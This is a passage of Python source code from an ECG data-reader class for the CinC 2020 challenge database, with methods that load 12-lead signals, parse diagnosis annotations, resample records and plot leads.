`nan` values. One can check using the following code >>> rec = "E04603" >>> dr.plot(rec, dr.load_data(rec, backend="scipy", units="uv")) # currently raising error Usage ----- 1. 
ECG arrhythmia detection References ---------- [1] https://physionetchallenges.github.io/2020/ [2] http://2018.icbeb.org/# [3] https://physionet.org/content/incartdb/1.0.0/ [4] https://physionet.org/content/ptbdb/1.0.0/ [5] https://physionet.org/content/ptb-xl/1.0.1/ [6] (deprecated) https://storage.cloud.google.com/physionet-challenge-2020-12-lead-ecg-public/ [7] (recommended) https://storage.cloud.google.com/physionetchallenge2021-public-datasets/ """ def __init__(self, db_dir:str, working_dir:Optional[str]=None, verbose:int=2, **kwargs:Any) -> NoReturn: """ Parameters ---------- db_dir: str, storage path of the database working_dir: str, optional, working directory, to store intermediate files and log file verbose: int, default 2, log verbosity kwargs: auxilliary key word arguments """ super().__init__(db_name="CINC2020", db_dir=db_dir, working_dir=working_dir, verbose=verbose, **kwargs) self.rec_ext = "mat" self.ann_ext = "hea" self.db_tranches = list("ABCDEF") self.tranche_names = CFG({ "A": "CPSC", "B": "CPSC-Extra", "C": "StPetersburg", "D": "PTB", "E": "PTB-XL", "F": "Georgia", }) self.rec_prefix = CFG({ "A": "A", "B": "Q", "C": "I", "D": "S", "E": "HR", "F": "E", }) self.db_dir_base = db_dir self.db_dirs = CFG({tranche:"" for tranche in self.db_tranches}) self._all_records = None self._ls_rec() # loads file system structures into self.db_dirs and self._all_records self._diagnoses_records_list = None self._ls_diagnoses_records() self.fs = { "A": 500, "B": 500, "C": 257, "D": 1000, "E": 500, "F": 500, } self.spacing = {t: 1000 / f for t,f in self.fs.items()} self.all_leads = deepcopy(EAK.Standard12Leads) self._all_leads_set = set(self.all_leads) self.df_ecg_arrhythmia = dx_mapping_all[["Dx","SNOMED CT Code","Abbreviation"]] self.ann_items = [ "rec_name", "nb_leads","fs","nb_samples","datetime","age","sex", "diagnosis","df_leads", "medical_prescription","history","symptom_or_surgery", ] self.label_trans_dict = equiv_class_dict.copy() # self.value_correction_factor = CFG({tranche:1 for tranche in self.db_tranches}) # self.value_correction_factor.F = 4.88 # ref. ISSUES 3 self.exceptional_records = ["E04603", "E06072", "E06909", "E07675", "E07941", "E08321"] # ref. ISSUES 4 def get_subject_id(self, rec:str) -> int: """ finished, checked, Parameters ---------- rec: str, name of the record Returns ------- sid: int, the `subject_id` corr. 
to `rec` """ s2d = {"A":"11", "B":"12", "C":"21", "D":"31", "E":"32", "F":"41"} s2d = {self.rec_prefix[k]:v for k,v in s2d.items()} prefix = "".join(re.findall(r"[A-Z]", rec)) n = rec.replace(prefix,"") sid = int(f"{s2d[prefix]}{'0'*(8-len(n))}{n}") return sid def _ls_rec(self) -> NoReturn: """ finished, checked, list all the records and load into `self._all_records`, facilitating further uses """ fn = "record_list.json" record_list_fp = os.path.join(self.db_dir_base, fn) if os.path.isfile(record_list_fp): with open(record_list_fp, "r") as f: self._all_records = {k:v for k,v in json.load(f).items() if k in self.tranche_names} for tranche in self.db_tranches: self.db_dirs[tranche] = os.path.join(self.db_dir_base, os.path.dirname(self._all_records[tranche][0])) self._all_records[tranche] = [os.path.basename(f) for f in self._all_records[tranche]] else: print("Please wait patiently to let the reader find all records of all the tranches...") start = time.time() rec_patterns_with_ext = { tranche: f"^{self.rec_prefix[tranche]}(?:\d+).{self.rec_ext}$" \ for tranche in self.db_tranches } self._all_records = \ get_record_list_recursive3(self.db_dir_base, rec_patterns_with_ext) to_save = deepcopy(self._all_records) for tranche in self.db_tranches: tmp_dirname = [ os.path.dirname(f) for f in self._all_records[tranche] ] if len(set(tmp_dirname)) != 1: if len(set(tmp_dirname)) > 1: raise ValueError(f"records of tranche {tranche} are stored in several folders!") else: raise ValueError(f"no record found for tranche {tranche}!") self.db_dirs[tranche] = os.path.join(self.db_dir_base, tmp_dirname[0]) self._all_records[tranche] = [os.path.basename(f) for f in self._all_records[tranche]] print(f"Done in {time.time() - start:.5f} seconds!") with open(os.path.join(self.db_dir_base, fn), "w") as f: json.dump(to_save, f) def _ls_diagnoses_records(self) -> NoReturn: """ finished, checked, list all the records for all diagnoses """ fn = "diagnoses_records_list.json" dr_fp = os.path.join(self.db_dir_base, fn) if os.path.isfile(dr_fp): with open(dr_fp, "r") as f: self._diagnoses_records_list = json.load(f) else: print("Please wait several minutes patiently to let the reader list records for each diagnosis...") start = time.time() self._diagnoses_records_list = {d: [] for d in df_weights_abbr.columns.values.tolist()} for tranche, l_rec in self._all_records.items(): for rec in l_rec: ann = self.load_ann(rec) ld = ann["diagnosis_scored"]["diagnosis_abbr"] for d in ld: self._diagnoses_records_list[d].append(rec) print(f"Done in {time.time() - start:.5f} seconds!") with open(dr_fp, "w") as f: json.dump(self._diagnoses_records_list, f) self._all_records = CFG(self._all_records) @property def diagnoses_records_list(self): """ finished, checked, """ if self._diagnoses_records_list is None: self._ls_diagnoses_records() return self._diagnoses_records_list def _get_tranche(self, rec:str) -> str: """ finished, checked, get the tranche"s symbol (one of "A","B","C","D","E","F") of a record via its name Parameters ---------- rec: str, name of the record Returns ------- tranche, str, symbol of the tranche, ref. 
`self.rec_prefix` """ prefix = "".join(re.findall(r"[A-Z]", rec)) tranche = {v:k for k,v in self.rec_prefix.items()}[prefix] return tranche def get_data_filepath(self, rec:str, with_ext:bool=True) -> str: """ finished, checked, get the absolute file path of the data file of `rec` Parameters ---------- rec: str, name of the record with_ext: bool, default True, if True, the returned file path comes with file extension, otherwise without file extension, which is useful for `wfdb` functions Returns ------- fp: str, absolute file path of the data file of the record """ tranche = self._get_tranche(rec) fp = os.path.join(self.db_dirs[tranche], f"{rec}.{self.rec_ext}") if not with_ext: fp = os.path.splitext(fp)[0] return fp def get_header_filepath(self, rec:str, with_ext:bool=True) -> str: """ finished, checked, get the absolute file path of the header file of `rec` Parameters ---------- rec: str, name of the record with_ext: bool, default True, if True, the returned file path comes with file extension, otherwise without file extension, which is useful for `wfdb` functions Returns ------- fp: str, absolute file path of the header file of the record """ tranche = self._get_tranche(rec) fp = os.path.join(self.db_dirs[tranche], f"{rec}.{self.ann_ext}") if not with_ext: fp = os.path.splitext(fp)[0] return fp def get_ann_filepath(self, rec:str, with_ext:bool=True) -> str: """ finished, checked, alias for `get_header_filepath` """ fp = self.get_header_filepath(rec, with_ext=with_ext) return fp def load_data(self, rec:str, leads:Optional[Union[str, List[str]]]=None, data_format:str="channel_first", backend:str="wfdb", units:str="mV", fs:Optional[Real]=None) -> np.ndarray: """ finished, checked, load physical (converted from digital) ecg data, which is more understandable for humans Parameters ---------- rec: str, name of the record leads: str or list of str, optional, the leads to load data_format: str, default "channel_first", format of the ecg data, "channel_last" (alias "lead_last"), or "channel_first" (alias "lead_first") backend: str, default "wfdb", the backend data reader, can also be "scipy" units: str, default "mV", units of the output signal, can also be "μV", with an alias of "uV" fs: real number, optional, if not None, the loaded data will be resampled to this frequency Returns ------- data: ndarray, the ecg data """ assert data_format.lower() in ["channel_first", "lead_first", "channel_last", "lead_last"] tranche = self._get_tranche(rec) if not leads: _leads = self.all_leads elif isinstance(leads, str): _leads = [leads] else: _leads = leads # if tranche in "CD" and fs == 500: # resample will be done at the end of the function # data = self.load_resampled_data(rec) if backend.lower() == "wfdb": rec_fp = self.get_data_filepath(rec, with_ext=False) # p_signal of "lead_last" format wfdb_rec = wfdb.rdrecord(rec_fp, physical=True, channel_names=_leads) data = np.asarray(wfdb_rec.p_signal.T) # lead_units = np.vectorize(lambda s: s.lower())(wfdb_rec.units) elif backend.lower() == "scipy": # loadmat of "lead_first" format rec_fp = self.get_data_filepath(rec, with_ext=True) data = loadmat(rec_fp)["val"] header_info = self.load_ann(rec, raw=False)["df_leads"] baselines = header_info["baseline"].values.reshape(data.shape[0], -1) adc_gain = header_info["adc_gain"].values.reshape(data.shape[0], -1) data = np.asarray(data-baselines) / adc_gain leads_ind = [self.all_leads.index(item) for item in _leads] data = data[leads_ind,:] # lead_units = np.vectorize(lambda s: 
s.lower())(header_info["df_leads"]["adc_units"].values) else: raise ValueError(f"backend `{backend.lower()}` not supported for loading data") # ref. ISSUES 3, for multiplying `value_correction_factor` # data = data * self.value_correction_factor[tranche] if units.lower() in ["uv", "μv"]: data = data * 1000 if fs is not None and fs != self.fs[tranche]: data = resample_poly(data, fs, self.fs[tranche], axis=1) if data_format.lower() in ["channel_last", "lead_last"]: data = data.T return data def load_ann(self, rec:str, raw:bool=False, backend:str="wfdb") -> Union[dict,str]: """ finished, checked, load annotations (header) stored in the .hea files Parameters ---------- rec: str, name of the record raw: bool, default False, if True, the raw annotations without parsing will be returned backend: str, default "wfdb", case insensitive, if is "wfdb", `wfdb.rdheader` will be used to load the annotations; if is "naive", annotations will be parsed from the lines read from the header files Returns ------- ann_dict, dict or str, the annotations with items: ref. `self.ann_items` """ tranche = self._get_tranche(rec) ann_fp = self.get_ann_filepath(rec, with_ext=True) with open(ann_fp, "r") as f: header_data = f.read().splitlines() if raw: ann_dict = "\n".join(header_data) return ann_dict if backend.lower() == "wfdb": ann_dict = self._load_ann_wfdb(rec, header_data) elif backend.lower() == "naive": ann_dict = self._load_ann_naive(header_data) else: raise ValueError(f"backend `{backend.lower()}` not supported for loading annotations") return ann_dict def _load_ann_wfdb(self, rec:str, header_data:List[str]) -> dict: """ finished, checked, Parameters ---------- rec: str, name of the record header_data: list of str, list of lines read directly from a header file, complementary to data read using `wfdb.rdheader` if applicable, this data will be used, since `datetime` is not well parsed by `wfdb.rdheader` Returns ------- ann_dict, dict, the annotations with items: ref. `self.ann_items` """ header_fp = self.get_header_filepath(rec, with_ext=False) header_reader = wfdb.rdheader(header_fp) ann_dict = {} ann_dict["rec_name"], ann_dict["nb_leads"], ann_dict["fs"], ann_dict["nb_samples"], ann_dict["datetime"], daytime = header_data[0].split(" ") ann_dict["nb_leads"] = int(ann_dict["nb_leads"]) ann_dict["fs"] = int(ann_dict["fs"]) ann_dict["nb_samples"] = int(ann_dict["nb_samples"]) ann_dict["datetime"] = datetime.strptime(" ".join([ann_dict["datetime"], daytime]), "%d-%b-%Y %H:%M:%S") try: # see NOTE. 1. 
ann_dict["age"] = int([l for l in header_reader.comments if "Age" in l][0].split(": ")[-1]) except: ann_dict["age"] = np.nan try: ann_dict["sex"] = [l for l in header_reader.comments if "Sex" in l][0].split(": ")[-1] except: ann_dict["sex"] = "Unknown" try: ann_dict["medical_prescription"] = [l for l in header_reader.comments if "Rx" in l][0].split(": ")[-1] except: ann_dict["medical_prescription"] = "Unknown" try: ann_dict["history"] = [l for l in header_reader.comments if "Hx" in l][0].split(": ")[-1] except: ann_dict["history"] = "Unknown" try: ann_dict["symptom_or_surgery"] = [l for l in header_reader.comments if "Sx" in l][0].split(": ")[-1] except: ann_dict["symptom_or_surgery"] = "Unknown" l_Dx = [l for l in header_reader.comments if "Dx" in l][0].split(": ")[-1].split(",") ann_dict["diagnosis"], ann_dict["diagnosis_scored"] = self._parse_diagnosis(l_Dx) df_leads = pd.DataFrame() for k in ["file_name", "fmt", "byte_offset", "adc_gain", "units", "adc_res", "adc_zero", "baseline", "init_value", "checksum", "block_size", "sig_name"]: df_leads[k] = header_reader.__dict__[k] df_leads = df_leads.rename( columns={ "sig_name": "lead_name", "units":"adc_units", "file_name":"filename", } ) df_leads.index = df_leads["lead_name"] df_leads.index.name = None ann_dict["df_leads"] = df_leads return ann_dict def _load_ann_naive(self, header_data:List[str]) -> dict: """ finished, checked, load annotations (header) using raw data read directly from a header file Parameters ---------- header_data: list of str, list of lines read directly from a header file Returns ------- ann_dict, dict, the annotations with items: ref. `self.ann_items` """ ann_dict = {} ann_dict["rec_name"], ann_dict["nb_leads"], ann_dict["fs"], ann_dict["nb_samples"], ann_dict["datetime"], daytime = header_data[0].split(" ") ann_dict["nb_leads"] = int(ann_dict["nb_leads"]) ann_dict["fs"] = int(ann_dict["fs"]) ann_dict["nb_samples"] = int(ann_dict["nb_samples"]) ann_dict["datetime"] = datetime.strptime(" ".join([ann_dict["datetime"], daytime]), "%d-%b-%Y %H:%M:%S") try: # see NOTE. 1. 
ann_dict["age"] = int([l for l in header_data if l.startswith("#Age")][0].split(": ")[-1]) except: ann_dict["age"] = np.nan try: ann_dict["sex"] = [l for l in header_data if l.startswith("#Sex")][0].split(": ")[-1] except: ann_dict["sex"] = "Unknown" try: ann_dict["medical_prescription"] = [l for l in header_data if l.startswith("#Rx")][0].split(": ")[-1] except: ann_dict["medical_prescription"] = "Unknown" try: ann_dict["history"] = [l for l in header_data if l.startswith("#Hx")][0].split(": ")[-1] except: ann_dict["history"] = "Unknown" try: ann_dict["symptom_or_surgery"] = [l for l in header_data if l.startswith("#Sx")][0].split(": ")[-1] except: ann_dict["symptom_or_surgery"] = "Unknown" l_Dx = [l for l in header_data if l.startswith("#Dx")][0].split(": ")[-1].split(",") ann_dict["diagnosis"], ann_dict["diagnosis_scored"] = self._parse_diagnosis(l_Dx) ann_dict["df_leads"] = self._parse_leads(header_data[1:13]) return ann_dict def _parse_diagnosis(self, l_Dx:List[str]) -> Tuple[dict, dict]: """ finished, checked, Parameters ---------- l_Dx: list of str, raw information of diagnosis, read from a header file Returns ------- diag_dict:, dict, diagnosis, including SNOMED CT Codes, fullnames and abbreviations of each diagnosis diag_scored_dict: dict, the scored items in `diag_dict` """ diag_dict, diag_scored_dict = {}, {} try: diag_dict["diagnosis_code"] = [item for item in l_Dx] # selection = dx_mapping_all["SNOMED CT Code"].isin(diag_dict["diagnosis_code"]) # diag_dict["diagnosis_abbr"] = dx_mapping_all[selection]["Abbreviation"].tolist() # diag_dict["diagnosis_fullname"] = dx_mapping_all[selection]["Dx"].tolist() diag_dict["diagnosis_abbr"] = \ [ dx_mapping_all[dx_mapping_all["SNOMED CT Code"]==dc]["Abbreviation"].values[0] \ for dc in diag_dict["diagnosis_code"] ] diag_dict["diagnosis_fullname"] = \ [ dx_mapping_all[dx_mapping_all["SNOMED CT Code"]==dc]["Dx"].values[0] \ for dc in diag_dict["diagnosis_code"] ] scored_indices = np.isin(diag_dict["diagnosis_code"], dx_mapping_scored["SNOMED CT Code"].values) diag_scored_dict["diagnosis_code"] = \ [ item for idx, item in enumerate(diag_dict["diagnosis_code"]) \ if scored_indices[idx] ] diag_scored_dict["diagnosis_abbr"] = \ [ item for idx, item in enumerate(diag_dict["diagnosis_abbr"]) \ if scored_indices[idx] ] diag_scored_dict["diagnosis_fullname"] = \ [ item for idx, item in enumerate(diag_dict["diagnosis_fullname"]) \ if scored_indices[idx] ] except: # the old version, the Dx"s are abbreviations diag_dict["diagnosis_abbr"] = diag_dict["diagnosis_code"] selection = dx_mapping_all["Abbreviation"].isin(diag_dict["diagnosis_abbr"]) diag_dict["diagnosis_fullname"] = dx_mapping_all[selection]["Dx"].tolist() # if not keep_original: # for idx, d in enumerate(ann_dict["diagnosis_abbr"]): # if d in ["Normal", "NSR"]: # ann_dict["diagnosis_abbr"] = ["N"] return diag_dict, diag_scored_dict def _parse_leads(self, l_leads_data:List[str]) -> pd.DataFrame: """ finished, checked, Parameters ---------- l_leads_data: list of str, raw information of each lead, read from a header file Returns ------- df_leads: DataFrame, infomation of each leads in the format of DataFrame """ df_leads = pd.read_csv(io.StringIO("\n".join(l_leads_data)), delim_whitespace=True, header=None) df_leads.columns = ["filename", "fmt+byte_offset", "adc_gain+units", "adc_res", "adc_zero", "init_value", "checksum", "block_size", "lead_name",] df_leads["fmt"] = df_leads["fmt+byte_offset"].apply(lambda s: s.split("+")[0]) df_leads["byte_offset"] = df_leads["fmt+byte_offset"].apply(lambda 
s: s.split("+")[1]) df_leads["adc_gain"] = df_leads["adc_gain+units"].apply(lambda s: s.split("/")[0]) df_leads["adc_units"] = df_leads["adc_gain+units"].apply(lambda s: s.split("/")[1]) for k in ["byte_offset", "adc_gain", "adc_res", "adc_zero", "init_value", "checksum",]: df_leads[k] = df_leads[k].apply(lambda s: int(s)) df_leads["baseline"] = df_leads["adc_zero"] df_leads = df_leads[["filename", "fmt", "byte_offset", "adc_gain", "adc_units", "adc_res", "adc_zero", "baseline", "init_value", "checksum", "block_size", "lead_name"]] df_leads.index = df_leads["lead_name"] df_leads.index.name = None return df_leads def load_header(self, rec:str, raw:bool=False) -> Union[dict,str]: """ alias for `load_ann`, as annotations are also stored in header files """ return self.load_ann(rec, raw) def get_labels(self, rec:str, scored_only:bool=True, fmt:str="s", normalize:bool=True) -> List[str]: """ finished, checked, read labels (diagnoses or arrhythmias) of a record Parameters ---------- rec: str, name of the record scored_only: bool, default True, only get the labels that are scored in the CINC2020 official phase fmt: str, default "a", the format of labels, one of the following (case insensitive): - "a", abbreviations - "f", full names - "s", SNOMED CT Code normalize: bool, default True, if True, the labels will be transformed into their equavalents, which are defined in `utils.utils_misc.cinc2020_aux_data.py` Returns ------- labels, list, the list of labels """ ann_dict = self.load_ann(rec) if scored_only: labels = ann_dict["diagnosis_scored"] else: labels = ann_dict["diagnosis"] if fmt.lower() == "a": labels = labels["diagnosis_abbr"] elif fmt.lower() == "f": labels = labels["diagnosis_fullname"] elif fmt.lower() == "s": labels = labels["diagnosis_code"] else: raise ValueError(f"`fmt` should be one of `a`, `f`, `s`, but got `{fmt}`") if normalize: labels = [self.label_trans_dict.get(item, item) for item in labels] return labels def get_fs(self, rec:str) -> Real: """ finished, checked, get the sampling frequency of a record Parameters ---------- rec: str, name of the record Returns ------- fs: real number, sampling frequency of the record `rec` """ tranche = self._get_tranche(rec) fs = self.fs[tranche] return fs def get_subject_info(self, rec:str, items:Optional[List[str]]=None) -> dict: """ finished, checked, read auxiliary information of a subject (a record) stored in the header files Parameters ---------- rec: str, name of the record items: list of str, optional, items of the subject's information (e.g. sex, age, etc.) 
Returns ------- subject_info: dict, information about the subject, including "age", "sex", "medical_prescription", "history", "symptom_or_surgery", """ if items is None or len(items) == 0: info_items = [ "age", "sex", "medical_prescription", "history", "symptom_or_surgery", ] else: info_items = items ann_dict = self.load_ann(rec) subject_info = [ann_dict[item] for item in info_items] return subject_info def save_challenge_predictions(self, rec:str, output_dir:str, scores:List[Real], labels:List[int], classes:List[str]) -> NoReturn: """ NOT finished, NOT checked, need updating, TODO: update for the official phase Parameters ---------- rec: str, name of the record output_dir: str, directory to save the predictions scores: list of real, raw predictions labels: list of int, 0 or 1, binary predictions classes: list of str, SNOMED CT Code of binary predictions """ new_file = f"{rec}.csv" output_file = os.path.join(output_dir, new_file) # Include the filename as the recording number recording_string = f"#{rec}" class_string = ",".join(classes) label_string = ",".join(str(i) for i in labels) score_string = ",".join(str(i) for i in scores) with open(output_file, "w") as f: # f.write(recording_string + "\n" + class_string + "\n" + label_string + "\n" + score_string + "\n") f.write("\n".join([recording_string, class_string, label_string, score_string, ""])) def plot(self, rec:str, data:Optional[np.ndarray]=None, ann:Optional[Dict[str, np.ndarray]]=None, ticks_granularity:int=0, leads:Optional[Union[str, List[str]]]=None, same_range:bool=False, waves:Optional[Dict[str, Sequence[int]]]=None, **kwargs:Any) -> NoReturn: """ finished, checked, to improve, plot the signals of a record or external signals (units in μV), with metadata (fs, labels, tranche, etc.), possibly also along with wave delineations Parameters ---------- rec: str, name of the record data: ndarray, optional, (12-lead) ecg signal to plot, should be of the format "channel_first", and compatible with `leads` if given, data of `rec` will not be used, this is useful when plotting filtered data ann: dict, optional, annotations for `data`, with 2 items: "scored", "all", ignored if `data` is None ticks_granularity: int, default 0, the granularity to plot axis ticks, the higher the more, 0 (no ticks) --> 1 (major ticks) --> 2 (major + minor ticks) leads: str or list of str, optional, the leads to plot same_range: bool, default False, if True, forces all leads to have the same y range waves: dict, optional, indices of the wave critical points, including "p_onsets", "p_peaks", "p_offsets", "q_onsets", "q_peaks", "r_peaks", "s_peaks", "s_offsets", "t_onsets", "t_peaks", "t_offsets" kwargs: dict, TODO ---- 1. slice too long records, and plot separately for each segment 2. 
plot waves using `axvspan` NOTE ---- `Locator` of `plt` has default `MAXTICKS` equal to 1000, if not modifying this number, at most 40 seconds of signal could be plotted once Contributors: Jeethan, and WEN Hao """ tranche = self._get_tranche(rec) if tranche in "CDE": physionet_lightwave_suffix = CFG({ "C": "incartdb/1.0.0", "D": "ptbdb/1.0.0", "E": "ptb-xl/1.0.1", }) url = f"https://physionet.org/lightwave/?db={physionet_lightwave_suffix[tranche]}" print(f"better view: {url}") if "plt" not in dir(): import matplotlib.pyplot as plt plt.MultipleLocator.MAXTICKS = 3000 if leads is None or leads == "all": _leads = self.all_leads elif isinstance(leads, str): _leads = [leads] else: _leads = leads # assert all([l in self.all_leads for l in _leads]) assert set(_leads).issubset(self._all_leads_set) # lead_list = self.load_ann(rec)["df_leads"]["lead_name"].tolist() # lead_indices = [lead_list.index(l) for l in _leads] lead_indices = [self.all_leads.index(l) for l in _leads] if data is None: _data = self.load_data(rec, data_format="channel_first", units="μV")[lead_indices] else: units = self._auto_infer_units(data) print(f"input data is auto detected to have units in {units}") if units.lower() == "mv": _data = 1000 * data else: _data = data assert _data.shape[0] == len(_leads), \ f"number of leads from data of shape ({_data.shape[0]}) does not match the length ({len(_leads)}) of `leads`" if same_range: y_ranges = np.ones((_data.shape[0],)) * np.max(np.abs(_data)) + 100 else: y_ranges = np.max(np.abs(_data), axis=1) + 100 if waves: if waves.get("p_onsets", None) and waves.get("p_offsets", None): p_waves = [ [onset, offset] \ for onset, offset in zip(waves["p_onsets"], waves["p_offsets"]) ] elif waves.get("p_peaks", None): p_waves = [ [ max(0, p + ms2samples(PlotCfg.p_onset, fs=self.get_fs(rec))), min(_data.shape[1], p + ms2samples(PlotCfg.p_offset, fs=self.get_fs(rec))) ] for p in waves["p_peaks"] ] else: p_waves = [] if waves.get("q_onsets", None) and waves.get("s_offsets", None): qrs = [ [onset, offset] for onset, offset in zip(waves["q_onsets"], waves["s_offsets"]) ] elif waves.get("q_peaks", None) and waves.get("s_peaks", None): qrs = [ [ max(0, q + ms2samples(PlotCfg.q_onset, fs=self.get_fs(rec))), min(_data.shape[1], s + ms2samples(PlotCfg.s_offset, fs=self.get_fs(rec))) ] for q,s in zip(waves["q_peaks"], waves["s_peaks"]) ] elif waves.get("r_peaks", None): qrs = [ [ max(0, r + ms2samples(PlotCfg.qrs_radius, fs=self.get_fs(rec))), min(_data.shape[1], r + ms2samples(PlotCfg.qrs_radius, fs=self.get_fs(rec))) ] for r in waves["r_peaks"] ] else: qrs = [] if waves.get("t_onsets", None) and waves.get("t_offsets", None): t_waves = [ [onset, offset] for onset, offset in zip(waves["t_onsets"], waves["t_offsets"]) ] elif waves.get("t_peaks", None): t_waves = [ [ max(0, t + ms2samples(PlotCfg.t_onset, fs=self.get_fs(rec))), min(_data.shape[1], t + ms2samples(PlotCfg.t_offset, fs=self.get_fs(rec))) ] for t in waves["t_peaks"] ] else: t_waves = [] else: p_waves, qrs, t_waves = [], [], [] palette = {"p_waves": "green", "qrs": "red", "t_waves": "pink",} plot_alpha = 0.4 if ann is None or data is None: diag_scored = self.get_labels(rec, scored_only=True, fmt="a") diag_all = self.get_labels(rec, scored_only=False, fmt="a") else: diag_scored = ann["scored"] diag_all = ann["all"] nb_leads = len(_leads) seg_len = self.fs[tranche] * 25 # 25 seconds nb_segs = _data.shape[1] // seg_len t = np.arange(_data.shape[1]) / self.fs[tranche] duration = len(t) / self.fs[tranche] fig_sz_w = int(round(DEFAULT_FIG_SIZE_PER_SEC * 
duration)) fig_sz_h = 6 * np.maximum(y_ranges, 750) / 1500 fig, axes = plt.subplots(nb_leads, 1, sharex=False, figsize=(fig_sz_w, np.sum(fig_sz_h))) if nb_leads == 1: axes = [axes] for idx in range(nb_leads): axes[idx].plot(t, _data[idx], color="black", linewidth="2.0", label=f"lead - {_leads[idx]}") axes[idx].axhline(y=0, linestyle="-", linewidth="1.0", color="red") # NOTE that `Locator` has default `MAXTICKS` equal to 1000 if ticks_granularity >= 1: axes[idx].xaxis.set_major_locator(plt.MultipleLocator(0.2)) axes[idx].yaxis.set_major_locator(plt.MultipleLocator(500)) axes[idx].grid(which="major", linestyle="-", linewidth="0.4", color="red") if ticks_granularity >= 2: axes[idx].xaxis.set_minor_locator(plt.MultipleLocator(0.04)) axes[idx].yaxis.set_minor_locator(plt.MultipleLocator(100)) axes[idx].grid(which="minor", linestyle=":", linewidth="0.2", color="gray") # add extra info. to legend # https://stackoverflow.com/questions/16826711/is-it-possible-to-add-a-string-as-a-legend-item-in-matplotlib axes[idx].plot([], [], " ", label=f"labels_s - {','.join(diag_scored)}") axes[idx].plot([], [], " ", label=f"labels_a - {','.join(diag_all)}") axes[idx].plot([], [], " ", label=f"tranche - {self.tranche_names[tranche]}") axes[idx].plot([], [], " ", label=f"fs - {self.fs[tranche]}") for w in ["p_waves", "qrs", "t_waves"]: for itv in eval(w): axes[idx].axvspan(itv[0], itv[1], color=palette[w], alpha=plot_alpha) axes[idx].legend(loc="upper left", fontsize=14) axes[idx].set_xlim(t[0], t[-1]) axes[idx].set_ylim(min(-600, -y_ranges[idx]), max(600, y_ranges[idx])) axes[idx].set_xlabel("Time [s]", fontsize=16) axes[idx].set_ylabel("Voltage [μV]", fontsize=16) plt.subplots_adjust(hspace=0.05) fig.tight_layout() if kwargs.get("save_path", None): plt.savefig(kwargs["save_path"], dpi=200, bbox_inches="tight") else: plt.show() def get_tranche_class_distribution(self, tranches:Sequence[str], scored_only:bool=True) -> Dict[str, int]: """ finished, checked, Parameters ---------- tranches: sequence of str, tranche symbols (A-F) scored_only: bool, default True, only get class distributions that are scored in the CINC2020 official phase Returns ------- distribution: dict, keys are abbrevations of the classes, values are appearance of corr. classes in the tranche. """ tranche_names = [self.tranche_names[t] for t in tranches] df = dx_mapping_scored if scored_only else dx_mapping_all distribution = CFG() for _, row in df.iterrows(): num = (row[[tranche_names]].values).sum() if num > 0: distribution[row["Abbreviation"]] = num return distribution @staticmethod def get_arrhythmia_knowledge(arrhythmias:Union[str,List[str]], **kwargs) -> NoReturn: """ finished, checked, knowledge about ECG features of specific arrhythmias, Parameters ---------- arrhythmias: str, or list of str, the arrhythmia(s) to check, in abbreviations or in SNOMED CT Code """ if isinstance(arrhythmias, str): d = [normalize_class(arrhythmias)] else: d = [normalize_class(c) for c in arrhythmias] # pp = pprint.PrettyPrinter(indent=4) # unsupported = [item for item in d if item not in dx_mapping_all["Abbreviation"]] unsupported = [item for item in d if item not in dx_mapping_scored["Abbreviation"].values] assert len(unsupported) == 0, \ f"`{unsupported}` {'is' if len(unsupported)==1 else 'are'} not supported!" 
for idx, item in enumerate(d): # pp.pprint(eval(f"EAK.{item}")) print(dict_to_str(eval(f"EAK.{item}"))) if idx < len(d)-1: print("*"*110) def load_resampled_data(self, rec:str, data_format:str="channel_first", siglen:Optional[int]=None) -> np.ndarray: """ finished, checked, resample the data of `rec` to 500Hz, or load the resampled data in 500Hz, if the corr. data file already exists Parameters ---------- rec: str, name of the record data_format: str, default "channel_first", format of the ecg data, "channel_last" (alias "lead_last"), or "channel_first" (alias "lead_first") siglen: int, optional, signal length, units in number of samples, if set, signal with length longer will be sliced to the length of `siglen` used for example when preparing/doing model training Returns ------- data: ndarray, the resampled (and perhaps sliced) signal data """ tranche = self._get_tranche(rec) if siglen is None: rec_fp = os.path.join(self.db_dirs[tranche], f"{rec}_500Hz.npy") else: rec_fp = os.path.join(self.db_dirs[tranche], f"{rec}_500Hz_siglen_{siglen}.npy") if not os.path.isfile(rec_fp): # print(f"corresponding file {os.basename(rec_fp)} does not exist") data = self.load_data(rec, data_format="channel_first", units="mV", fs=None) if self.fs[tranche] != 500: data = resample_poly(data, 500, self.fs[tranche], axis=1) if siglen is not None and data.shape[1] >= siglen: # slice_start = (data.shape[1] - siglen)//2 # slice_end = slice_start + siglen # data = data[..., slice_start:slice_end] data = ensure_siglen(data, siglen=siglen, fmt="channel_first") np.save(rec_fp, data) elif siglen is None: np.save(rec_fp, data) else: # print(f"loading from local file...") data = np.load(rec_fp) if data_format.lower() in ["channel_last", "lead_last"]: data = data.T return data def load_raw_data(self, rec:str, backend:str="scipy") -> np.ndarray: """ finished, checked, load raw data from corresponding files with no further processing, in order to facilitate feeding data into the `run_12ECG_classifier` function Parameters ---------- rec: str, name of the record backend: str, default "scipy", the backend data reader, can also be "wfdb", note that "scipy" provides data in the format of "lead_first", while "wfdb" provides data in the format of "lead_last", Returns ------- raw_data: ndarray, raw data (d_signal) loaded from corresponding data file, without subtracting baseline nor dividing adc gain """ tranche = self._get_tranche(rec) if backend.lower() == "wfdb": rec_fp = self.get_data_filepath(rec, with_ext=False) wfdb_rec = wfdb.rdrecord(rec_fp, physical=False) raw_data = np.asarray(wfdb_rec.d_signal) elif backend.lower() == "scipy": rec_fp = self.get_data_filepath(rec, with_ext=True) raw_data = loadmat(rec_fp)["val"] return raw_data def _check_nan(self, tranches:Union[str, Sequence[str]]) -> NoReturn: """ finished, checked, check if records from `tranches` has nan values accessing data using `p_signal` of `wfdb` would produce nan values, if exceptionally large values are encountered, this could help detect abnormal records as well Parameters ---------- tranches: str or sequence of str, tranches to check """ for t in tranches: for rec in self.all_records[t]: data = self.load_data(rec) if np.isnan(data).any(): print(f"record {rec} from tranche {t} has nan values") from ..aux_data.cinc2020_aux_data import load_weights def compute_all_metrics(classes:List[str], truth:Sequence, binary_pred:Sequence, scalar_pred:Sequence) -> Tuple[float]: """ finished, checked, Parameters ---------- classes: list of str, list of all the classes, in 
